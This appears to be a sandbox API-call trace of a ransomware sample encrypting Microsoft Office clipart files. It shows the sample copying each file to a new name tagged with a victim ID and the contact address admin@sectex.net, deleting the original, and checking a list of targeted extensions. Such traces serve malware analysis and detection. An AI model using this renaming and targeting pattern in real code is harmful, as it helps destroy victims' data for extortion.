	[0171.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183172.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0171.285] GetLastError () returned 0x0
	[0171.285] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x745c, lpOverlapped=0x0) returned 1
	[0171.292] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x7460, lpOverlapped=0x0) returned 1
	[0171.293] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.293] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.293] SetEndOfFile (hFile=0x3c4) returned 1
	[0171.293] CloseHandle (hObject=0x3c4) returned 1
	[0171.293] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.293] SetEndOfFile (hFile=0x388) returned 1
	[0171.296] CloseHandle (hObject=0x388) returned 1
	[0171.296] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.296] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183172.wmf")) returned 1
	[0171.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned 63
	[0171.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned 63
	[0171.297] lstrlenW (lpString=".doc") returned 4
	[0171.297] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.297] lstrlenW (lpString=".docx") returned 5
	[0171.297] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0171.297] lstrlenW (lpString=".pdf") returned 4
	[0171.297] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.297] lstrlenW (lpString=".xls") returned 4
	[0171.297] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.297] lstrlenW (lpString=".xlsx") returned 5
	[0171.297] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0171.297] lstrlenW (lpString=".ppt") returned 4
	[0171.297] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned 63
	[0171.297] lstrlenW (lpString=".zip") returned 4
	[0171.297] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.297] lstrlenW (lpString=".rar") returned 4
	[0171.297] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.297] lstrlenW (lpString=".bz2") returned 4
	[0171.297] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.297] lstrlenW (lpString=".7z") returned 3
	[0171.297] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned 63
	[0171.298] lstrlenW (lpString=".dbf") returned 4
	[0171.298] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned 63
	[0171.298] lstrlenW (lpString=".1cd") returned 4
	[0171.298] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned 63
	[0171.298] lstrlenW (lpString=".jpg") returned 4
	[0171.298] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned 63
	[0171.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned 63
	[0171.298] lstrlenW (lpString=".doc") returned 4
	[0171.298] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.298] lstrlenW (lpString=".docx") returned 5
	[0171.298] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0171.298] lstrlenW (lpString=".pdf") returned 4
	[0171.298] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.298] lstrlenW (lpString=".xls") returned 4
	[0171.298] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.298] lstrlenW (lpString=".xlsx") returned 5
	[0171.298] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0171.298] lstrlenW (lpString=".ppt") returned 4
	[0171.298] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned 63
	[0171.298] lstrlenW (lpString=".zip") returned 4
	[0171.298] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.298] lstrlenW (lpString=".rar") returned 4
	[0171.298] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.298] lstrlenW (lpString=".bz2") returned 4
	[0171.298] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.298] lstrlenW (lpString=".7z") returned 3
	[0171.298] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned 63
	[0171.299] lstrlenW (lpString=".dbf") returned 4
	[0171.299] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned 63
	[0171.299] lstrlenW (lpString=".1cd") returned 4
	[0171.299] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned 63
	[0171.299] lstrlenW (lpString=".jpg") returned 4
	[0171.299] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.299] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.299] lstrlenW (lpString="J0183574.WMF") returned 12
	[0171.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183574.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.300] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=19274) returned 1
	[0171.300] CloseHandle (hObject=0x388) returned 1
	[0171.300] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183574.wmf")) returned 0x20
	[0171.300] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183574.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.300] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183574.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.301] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.301] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183574.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0171.301] GetLastError () returned 0x0
	[0171.301] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x4b4a, lpOverlapped=0x0) returned 1
	[0171.304] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x4b50, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x4b50, lpOverlapped=0x0) returned 1
	[0171.305] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.305] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.305] SetEndOfFile (hFile=0x3c4) returned 1
	[0171.305] CloseHandle (hObject=0x3c4) returned 1
	[0171.305] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.305] SetEndOfFile (hFile=0x388) returned 1
	[0171.308] CloseHandle (hObject=0x388) returned 1
	[0171.308] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.308] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183574.wmf")) returned 1
	[0171.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 63
	[0171.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 63
	[0171.309] lstrlenW (lpString=".doc") returned 4
	[0171.309] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.309] lstrlenW (lpString=".docx") returned 5
	[0171.309] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0171.309] lstrlenW (lpString=".pdf") returned 4
	[0171.309] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.309] lstrlenW (lpString=".xls") returned 4
	[0171.309] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.309] lstrlenW (lpString=".xlsx") returned 5
	[0171.309] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0171.309] lstrlenW (lpString=".ppt") returned 4
	[0171.309] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 63
	[0171.309] lstrlenW (lpString=".zip") returned 4
	[0171.309] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.309] lstrlenW (lpString=".rar") returned 4
	[0171.309] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.309] lstrlenW (lpString=".bz2") returned 4
	[0171.309] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.309] lstrlenW (lpString=".7z") returned 3
	[0171.309] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 63
	[0171.309] lstrlenW (lpString=".dbf") returned 4
	[0171.309] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 63
	[0171.309] lstrlenW (lpString=".1cd") returned 4
	[0171.309] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 63
	[0171.310] lstrlenW (lpString=".jpg") returned 4
	[0171.310] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 63
	[0171.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 63
	[0171.310] lstrlenW (lpString=".doc") returned 4
	[0171.310] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.310] lstrlenW (lpString=".docx") returned 5
	[0171.310] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0171.310] lstrlenW (lpString=".pdf") returned 4
	[0171.310] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.310] lstrlenW (lpString=".xls") returned 4
	[0171.310] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.310] lstrlenW (lpString=".xlsx") returned 5
	[0171.310] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0171.310] lstrlenW (lpString=".ppt") returned 4
	[0171.310] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 63
	[0171.310] lstrlenW (lpString=".zip") returned 4
	[0171.310] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.310] lstrlenW (lpString=".rar") returned 4
	[0171.310] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.310] lstrlenW (lpString=".bz2") returned 4
	[0171.310] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.310] lstrlenW (lpString=".7z") returned 3
	[0171.310] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 63
	[0171.310] lstrlenW (lpString=".dbf") returned 4
	[0171.310] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 63
	[0171.310] lstrlenW (lpString=".1cd") returned 4
	[0171.311] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 63
	[0171.311] lstrlenW (lpString=".jpg") returned 4
	[0171.311] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.311] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.311] lstrlenW (lpString="J0185774.WMF") returned 12
	[0171.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185774.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.312] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=20038) returned 1
	[0171.312] CloseHandle (hObject=0x388) returned 1
	[0171.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185774.wmf")) returned 0x20
	[0171.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185774.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185774.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.313] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.313] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185774.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0171.313] GetLastError () returned 0x0
	[0171.313] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x4e46, lpOverlapped=0x0) returned 1
	[0171.315] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x4e50, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x4e50, lpOverlapped=0x0) returned 1
	[0171.317] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.317] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.317] SetEndOfFile (hFile=0x3c4) returned 1
	[0171.317] CloseHandle (hObject=0x3c4) returned 1
	[0171.317] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.317] SetEndOfFile (hFile=0x388) returned 1
	[0171.319] CloseHandle (hObject=0x388) returned 1
	[0171.320] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.320] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185774.wmf")) returned 1
	[0171.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned 63
	[0171.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned 63
	[0171.320] lstrlenW (lpString=".doc") returned 4
	[0171.320] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.320] lstrlenW (lpString=".docx") returned 5
	[0171.321] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0171.321] lstrlenW (lpString=".pdf") returned 4
	[0171.321] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.321] lstrlenW (lpString=".xls") returned 4
	[0171.321] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.321] lstrlenW (lpString=".xlsx") returned 5
	[0171.321] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0171.321] lstrlenW (lpString=".ppt") returned 4
	[0171.321] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned 63
	[0171.321] lstrlenW (lpString=".zip") returned 4
	[0171.321] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.321] lstrlenW (lpString=".rar") returned 4
	[0171.321] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.321] lstrlenW (lpString=".bz2") returned 4
	[0171.321] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.321] lstrlenW (lpString=".7z") returned 3
	[0171.321] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned 63
	[0171.321] lstrlenW (lpString=".dbf") returned 4
	[0171.321] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned 63
	[0171.321] lstrlenW (lpString=".1cd") returned 4
	[0171.321] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned 63
	[0171.321] lstrlenW (lpString=".jpg") returned 4
	[0171.321] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned 63
	[0171.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned 63
	[0171.321] lstrlenW (lpString=".doc") returned 4
	[0171.321] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.322] lstrlenW (lpString=".docx") returned 5
	[0171.322] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0171.322] lstrlenW (lpString=".pdf") returned 4
	[0171.322] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.322] lstrlenW (lpString=".xls") returned 4
	[0171.322] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.322] lstrlenW (lpString=".xlsx") returned 5
	[0171.322] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0171.322] lstrlenW (lpString=".ppt") returned 4
	[0171.322] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned 63
	[0171.322] lstrlenW (lpString=".zip") returned 4
	[0171.322] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.322] lstrlenW (lpString=".rar") returned 4
	[0171.322] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.322] lstrlenW (lpString=".bz2") returned 4
	[0171.322] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.322] lstrlenW (lpString=".7z") returned 3
	[0171.322] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned 63
	[0171.322] lstrlenW (lpString=".dbf") returned 4
	[0171.322] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned 63
	[0171.322] lstrlenW (lpString=".1cd") returned 4
	[0171.322] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned 63
	[0171.322] lstrlenW (lpString=".jpg") returned 4
	[0171.322] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.323] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.323] lstrlenW (lpString="J0185776.WMF") returned 12
	[0171.323] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185776.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.323] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=27096) returned 1
	[0171.323] CloseHandle (hObject=0x388) returned 1
	[0171.323] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185776.wmf")) returned 0x20
	[0171.323] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185776.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185776.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.324] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.324] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185776.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0171.325] GetLastError () returned 0x0
